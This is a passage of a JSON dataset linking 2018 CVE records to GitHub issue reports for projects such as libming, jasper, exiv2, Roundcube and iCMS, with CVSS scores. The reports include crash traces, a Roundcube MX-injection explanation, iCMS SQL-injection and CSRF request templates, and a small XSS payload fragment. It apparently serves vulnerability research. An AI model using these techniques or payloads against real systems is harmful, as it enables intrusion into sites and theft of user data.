NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG the second one NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: PATHTAG crashes NUMBERTAG APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG FE8: APITAG char const , unsigned long, unsigned long) APITAG NUMBERTAG by NUMBERTAG B NUMBERTAG C: APITAG unsigned char const , unsigned long, unsigned int) APITAG NUMBERTAG by NUMBERTAG CC: APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG Address NUMBERTAG b NUMBERTAG b5 is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2B NUMBERTAG operator APITAG long) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG B4B9: APITAG unsigned char const , unsigned long, unsigned int) APITAG NUMBERTAG by NUMBERTAG CC: APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG Address NUMBERTAG b NUMBERTAG b8 is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2C2BC: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG std::char_traits APITAG , std::allocator APITAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG D7BB: APITAG short, unsigned short) APITAG NUMBERTAG by NUMBERTAG B NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int) APITAG NUMBERTAG by NUMBERTAG CC: APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG B NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int) APITAG NUMBERTAG by NUMBERTAG CC: APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG Address NUMBERTAG b NUMBERTAG is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2B NUMBERTAG operator APITAG long) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG C9B NUMBERTAG at NUMBERTAG B NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int) APITAG NUMBERTAG by NUMBERTAG CC: APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG the pocs please refer to : URLTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-9159",
        "Issue_Url_old": "https://github.com/perwendel/spark/issues/981",
        "Issue_Url_new": "https://github.com/perwendel/spark/issues/981",
        "Repo_new": "perwendel/spark",
        "Issue_Created_At": "2018-02-25T05:25:55Z",
        "description": "Where Can I Report Security Vulnerability?. HI, I found a vulnerability and followed the steps URLTAG , and sent mail to people on this page URLTAG . But seems one of these mail addresses are not exists and there are no reply for NUMBERTAG days. Could you check the mail box? Thanks!",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-9165",
        "Issue_Url_old": "https://github.com/libming/libming/issues/121",
        "Issue_Url_new": "https://github.com/libming/libming/issues/121",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-03-09T06:35:17Z",
        "description": "Null pointer dereference vulnerability in APITAG APITAG . Hi, i found a null pointer dereference bug in the libming NUMBERTAG It crashed in function APITAG .the details are below(ASAN): ./swftoc NUMBERTAG NULL ptr swf /dev/null .... ... ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f9aac0d NUMBERTAG bp NUMBERTAG ffe NUMBERTAG d6c3d0 sp NUMBERTAG ffe NUMBERTAG d6bb NUMBERTAG T NUMBERTAG f9aac0d NUMBERTAG in strlen ( PATHTAG NUMBERTAG f9aaccab1a5 in __interceptor_strlen ( PATHTAG NUMBERTAG fd in APITAG PATHTAG NUMBERTAG d NUMBERTAG b in APITAG PATHTAG NUMBERTAG e7ea in APITAG PATHTAG NUMBERTAG eba0 in APITAG PATHTAG NUMBERTAG eccd in APITAG PATHTAG NUMBERTAG c6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG f3d9 in APITAG PATHTAG NUMBERTAG fb0e in main PATHTAG NUMBERTAG f9aac NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEG NUMBERTAG strlen NUMBERTAG ABORTING POC FILE\uff1a URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-9173",
        "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1266",
        "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1266",
        "Repo_new": "getsimplecms/getsimplecms",
        "Issue_Created_At": "2018-03-31T12:07:50Z",
        "description": "Cross Site Scripting Vulnerability in Latest Release NUMBERTAG Hi, I would like to report Cross Site Scripting vulnerability in latest release. Description: Cross site scripting (XSS) vulnerability in uploadify flash file might allow remote attackers to inject arbitrary web script or HTML via the multiple parameters. Steps To Reproduce NUMBERTAG Open below URL in browser which supports flash. URLTAG \"])}catche(e){alert(\"xss\")}// Fix: Update uploadify version. Release Info NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-9252",
        "Issue_Url_old": "https://github.com/mdadams/jasper/issues/173",
        "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/173",
        "Repo_new": "jasper-software/jasper",
        "Issue_Created_At": "2018-04-03T02:09:01Z",
        "description": "A reachable assertion abort in function jpc_abstorelstepsize. Description of problem: There is a reachable assertion abort in function jpc_abstorelstepsize of APITAG that will lead to remote denial of service attack. Version Release number of selected component (if applicable): APITAG , APITAG \"!((expn NUMBERTAG APITAG PATHTAG line=line APITAG APITAG APITAG \"jpc_abstorelste\"...) at APITAG NUMBERTAG ffff NUMBERTAG c NUMBERTAG in __GI___assert_fail (assertion NUMBERTAG ffff7b NUMBERTAG c NUMBERTAG expn NUMBERTAG file NUMBERTAG ffff7b NUMBERTAG bf0 PATHTAG line NUMBERTAG function NUMBERTAG ffff7b NUMBERTAG c0 APITAG \"jpc_abstorelste\"...) at APITAG NUMBERTAG ffff7b4cc0d in jpc_abstorelstepsize (absdelta NUMBERTAG scaleexpn NUMBERTAG at PATHTAG NUMBERTAG ffff7b NUMBERTAG e in jpc_enc_encodemainhdr (enc NUMBERTAG f NUMBERTAG at PATHTAG NUMBERTAG ffff7b4cdb7 in jpc_encode (image NUMBERTAG out NUMBERTAG d NUMBERTAG optstr NUMBERTAG fffffffc NUMBERTAG n_jp2overhead NUMBERTAG at PATHTAG NUMBERTAG ffff7b3a NUMBERTAG f in jp2_encode (image NUMBERTAG out NUMBERTAG d NUMBERTAG optstr NUMBERTAG at PATHTAG NUMBERTAG ffff7b1fc NUMBERTAG in jas_image_encode (image NUMBERTAG out NUMBERTAG d NUMBERTAG fmt NUMBERTAG optstr NUMBERTAG at PATHTAG NUMBERTAG c in main (argc NUMBERTAG arg NUMBERTAG fffffffdb NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG in __libc_start_main (main NUMBERTAG c NUMBERTAG APITAG , argc NUMBERTAG arg NUMBERTAG fffffffdb NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffdb NUMBERTAG at PATHTAG NUMBERTAG ba9 in _start () APITAG c static uint_fast NUMBERTAG t APITAG absdelta, int scaleexpn) { int p; uint_fast NUMBERTAG t mant; uint_fast NUMBERTAG t expn; int n; if (absdelta APITAG ( n)) : (absdelta << n NUMBERTAG ff; expn = scaleexpn p; if (scaleexpn < p) { APITAG } return JPC_QCX_EXPN(expn) | JPC_QCX_MANT(mant); } ` Additional info: Credits: pwd MENTIONTAG poc URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-9275",
        "Issue_Url_old": "https://github.com/Yubico/yubico-pam/issues/136",
        "Issue_Url_new": "https://github.com/yubico/yubico-pam/issues/136",
        "Repo_new": "yubico/yubico-pam",
        "Issue_Created_At": "2018-04-02T16:38:28Z",
        "description": "Authfile Leaking File Descriptor . When the authfile is successfully opened, the file descriptor is not closed and leaks file descriptors. The file descriptor should be closed after this line; URLTAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.2,
        "impactScore": 4.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-9304",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/262",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/262",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2018-04-04T08:08:31Z",
        "description": "a div by zero in APITAG A divide by zero occurs in function APITAG the debug info as follows: [ registers ] RA NUMBERTAG ffffffffffffffff RB NUMBERTAG RC NUMBERTAG ffff NUMBERTAG aa3d NUMBERTAG RD NUMBERTAG RSI NUMBERTAG RDI NUMBERTAG a NUMBERTAG ffff7b NUMBERTAG d NUMBERTAG ffff NUMBERTAG a NUMBERTAG APITAG APITAG push rbp) RBP NUMBERTAG fffffffe NUMBERTAG fffffffe NUMBERTAG fffffffe2c NUMBERTAG fffffffe NUMBERTAG fffffffe3b NUMBERTAG RSP NUMBERTAG fffffffe NUMBERTAG a NUMBERTAG ffff7b NUMBERTAG d NUMBERTAG ffff NUMBERTAG a NUMBERTAG APITAG APITAG push rbp) RIP NUMBERTAG ffff NUMBERTAG fc4 APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG div QWORD PTR [rbp NUMBERTAG e8]) R NUMBERTAG R NUMBERTAG ba NUMBERTAG R NUMBERTAG fffffffde NUMBERTAG R NUMBERTAG ffff NUMBERTAG a APITAG APITAG push rbp) R NUMBERTAG c6f8 APITAG const&)>: push rbp) R NUMBERTAG fffffffe NUMBERTAG R NUMBERTAG R NUMBERTAG EFLAGS NUMBERTAG carry parity adjust zero sign trap INTERRUPT direction overflow) [ code NUMBERTAG ffff NUMBERTAG fb4 APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG mov ebx,DWORD PTR [rbp NUMBERTAG ffff NUMBERTAG fba APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG call NUMBERTAG ffff NUMBERTAG APITAG NUMBERTAG ffff NUMBERTAG fbf APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG mov ed NUMBERTAG ffff NUMBERTAG fc4 APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG div QWORD PTR [rbp NUMBERTAG e NUMBERTAG ffff NUMBERTAG fcb APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG cmp rbx,ra NUMBERTAG ffff NUMBERTAG fce APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG seta al NUMBERTAG ffff NUMBERTAG fd1 APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG test al,al NUMBERTAG ffff NUMBERTAG fd3 APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG je NUMBERTAG ffff NUMBERTAG APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG stack NUMBERTAG fffffffe NUMBERTAG a NUMBERTAG ffff7b NUMBERTAG d NUMBERTAG ffff NUMBERTAG a NUMBERTAG APITAG APITAG push rbp NUMBERTAG fffffffe NUMBERTAG ffff7b NUMBERTAG b NUMBERTAG cd NUMBERTAG APITAG push rbp NUMBERTAG fffffffe NUMBERTAG fffffffe NUMBERTAG fffffffe NUMBERTAG ffff NUMBERTAG f NUMBERTAG ffff NUMBERTAG ad NUMBERTAG APITAG mov rax,QWORD PTR [rip NUMBERTAG c NUMBERTAG ffff NUMBERTAG fffffffe NUMBERTAG a NUMBERTAG ffff7b NUMBERTAG d NUMBERTAG ffff NUMBERTAG a NUMBERTAG APITAG APITAG push rbp NUMBERTAG fffffffe0a NUMBERTAG ffffe0d NUMBERTAG fffffffe0a NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGFPE NUMBERTAG ffff NUMBERTAG fc4 in Exi NUMBERTAG anonymous APITAG (this NUMBERTAG a NUMBERTAG out=..., APITAG dir_offset NUMBERTAG depth NUMBERTAG at APITAG NUMBERTAG if (size > APITAG / count) gdb peda$ p count NUMBERTAG gdb peda$ bt NUMBERTAG ffff NUMBERTAG fc4 in Exi NUMBERTAG anonymous APITAG (this NUMBERTAG a NUMBERTAG out=..., APITAG dir_offset NUMBERTAG depth NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG af6 in Exi NUMBERTAG anonymous APITAG (this NUMBERTAG a NUMBERTAG os=..., APITAG depth NUMBERTAG at APITAG NUMBERTAG ca2e in APITAG (this NUMBERTAG out=..., APITAG at APITAG NUMBERTAG c7f9 in APITAG (this NUMBERTAG path=\"crashes NUMBERTAG APITAG NUMBERTAG at APITAG NUMBERTAG e NUMBERTAG in main (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at APITAG NUMBERTAG ffff6ce9f NUMBERTAG in __libc_start_main (main NUMBERTAG dfae <main(int, char const )>, argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffe NUMBERTAG at libc APITAG NUMBERTAG dee9 in _start () ============= the poc please refer to : URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-9846",
        "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/6238",
        "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/6238",
        "Repo_new": "roundcube/roundcubemail",
        "Issue_Created_At": "2018-04-07T13:29:13Z",
        "description": "APITAG bypass in archive plugin. As explained in my last comment on NUMBERTAG which I'm going to quote): > in APITAG \"_uids\" it's taken via POST so it seems that you cannot exploit this since you'll end with APITAG checking for a token. But it's not like this. In APITAG there's a call to APITAG which get \"_uids\" again BUT with INPUT_GPC. So after line NUMBERTAG our _uids passed from GET it's injected. This by passes check_request: cause a request to APITAG it's considered a post, with empty $_POST. Which means that in versions previous to the APITAG first check for ajax requests this it's exploitable by just tricking the victim with clicking and/or a simple html page. Posterior version may be more difficult to exploit due to same origin policy. I tested this on roundcube NUMBERTAG and a simple APITAG works flawless. On more recent versions like NUMBERTAG SOP kick in but if it's somehow respected or bypassed then the same exploit works (will return a File not Found template, nonetheless code'll be executed).",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-9846",
        "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/6229",
        "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/6229",
        "Repo_new": "roundcube/roundcubemail",
        "Issue_Created_At": "2018-03-28T04:09:10Z",
        "description": "MX injection and type juggling vulnerabilities. Hello, I'm here to report two vulnerabilities I have found while doing research on Roundcube NUMBERTAG which are also present in your last release FILETAG . This two bugs are not exploitable in the wild, at least to my current knowledge; nonetheless fixing them should be a priority of yours because they could be chained with other minor stuff and then become exploitable in a realistic, attacker pov efficient way. Plus, with the ongoing grow of this project you may introduce features that could be used to leverage this stuff. Since the bugs are not so easy to spot, especially the mx injection, I'll now try to explain myself in the clearest way possible, the code I'll refer to it's the NUMBERTAG I'll conclude with a brief summary. MX Injection On function APITAG we have: APITAG A little bit of context: rcmail::get_uids inside the foreach cycle it's responsible to get $mbox from $uids which is passed via POST (line NUMBERTAG but anyway passing them by GET will work too); if provided with a format like ID MBOX it will split the thing and have $uids =array(ID) and $mbox =\"MBOX\"; Fine. The first IF and ELSE IF (line NUMBERTAG and NUMBERTAG set our prerequisite to exploit the bug: the archive folder has to be set, and the archive_type must be set and be different from \"folder\" that's because the function APITAG (line NUMBERTAG do his job right: will call APITAG which will call APITAG which will call APITAG which sanitize $uids. The problem lies in that else branch FILETAG line NUMBERTAG line NUMBERTAG APITAG calls fetch_headers($mbox, $uids); line NUMBERTAG APITAG calls APITAG where $folder is $mbox and $msgs is $uids line NUMBERTAG APITAG calls fetch($mailbox, $message_set, $is_uid, $query_items); APITAG it's a core function used everywhere for doing is job: fetching things. APITAG On line NUMBERTAG mailbox it's checked and the function returns false, so the attacker can't exploit that but, no check are done on $message_set which, still, is our user controlled input which will end in line NUMBERTAG the command to the MX server causing an MX injection. PHP Type Juggling This is far more easy to spot and straightforward, few words: on APITAG we have APITAG as you can see every check it's performed just with the == operator which is a loose not strict operator. This is not exploitable right now, and it's just a theorical bug, because you just use HTTP Paramaters which are strings, not typed but if you'll introduce JSON then this will become easily exploitable and will cause a CSRF bypass. APITAG Nonetheless as I said in my introduction you should fix this: what if I opened a \"JSON for post parameters\" request as a feature request? I hope I made myself enough clear, if you need more explanation: I am willing to help. When you fix this I'd like to write and publish a technical blog post about my findings ( the mx injection it's quite hided and nice, I think) if that's okay with you. PS: I think this issue should be private, not familiar with github if that's possible maybe we should do that.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-9856",
        "Issue_Url_old": "https://github.com/Kotti/Kotti/issues/551",
        "Issue_Url_new": "https://github.com/kotti/kotti/issues/551",
        "Repo_new": "kotti/kotti",
        "Issue_Created_At": "2018-03-27T09:19:53Z",
        "description": "APITAG Site Request Forgery) in Kotti. There is a APITAG Site Request Forgery) security vulnerablity in Kotti when you assign global roles. Detail If admin is an Adiministration with full permissions, and testuser is a common user with viewer permission, admin document is the document created by admin , when admin click the APITAG as bellow, testuser will be the owner of the admin document ( testuser has full permission of admin document ). APITAG CODETAG Advice: Add an anti CSRF token in the form when generate the form, and check the token in the view function. Tested in the Kotti NUMBERTAG but Kotti NUMBERTAG is also Vulnerable. Disclosuered By phoenix. EMAILTAG .cn",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-9922",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/16",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/16",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2018-03-25T12:34:08Z",
        "description": "Path leaks exist at the idreamsoft iCMS NUMBERTAG user registry. Path leaks exist at the idreamsoft iCMS NUMBERTAG user registry and can view the root path by constructing paylod\u3002 Paylod\uff1a POST PATHTAG HTTP NUMBERTAG Host: APITAG Content Length NUMBERTAG Accept: application/json, text/javascript, / ; q NUMBERTAG Origin: FILETAG X Requested With: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: APITAG APITAG APITAG Connection: close APITAG APITAG APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-9923",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/17",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/17",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2018-03-25T12:35:46Z",
        "description": "CSRF exists in the idreamsoft iCMS NUMBERTAG article add. CSRF exists in the idreamsoft iCMS NUMBERTAG article add and can be add\u00a0 the article by constructing paylod\u3002 Paylod\uff1a APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-9924",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/19",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/19",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2018-03-25T12:39:46Z",
        "description": "SQL injection exists in the idreamsoft ICMS NUMBERTAG tag add. SQL injection exists in the idreamsoft ICMS NUMBERTAG tag add\u3002 POST injection\uff1a POST APITAG APITAG HTTP NUMBERTAG Host: APITAG Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: FILETAG Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: APITAG APITAG APITAG APITAG APITAG APITAG Connection: close APITAG APITAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-9925",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/18",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/18",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2018-03-25T12:37:12Z",
        "description": "XSS exists in the idreamsoft ICMS NUMBERTAG user nickname. XSS exists in the idreamsoft ICMS NUMBERTAG user nickname and can be executed by setting up the paylod execution script\u3002 Paylod\uff1a POST APITAG APITAG HTTP NUMBERTAG Host: APITAG Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: FILETAG Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: APITAG APITAG APITAG APITAG APITAG APITAG Connection: close APITAG NUMBERTAG APITAG NUMBERTAG APITAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-9926",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/128",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/128",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2018-04-08T09:47:23Z",
        "description": "There is a CSRF vulnerability that can add the administrator account. After the administrator logged in, open the following two page poc\uff1a FILETAG ERRORTAG FILETAG ERRORTAG",
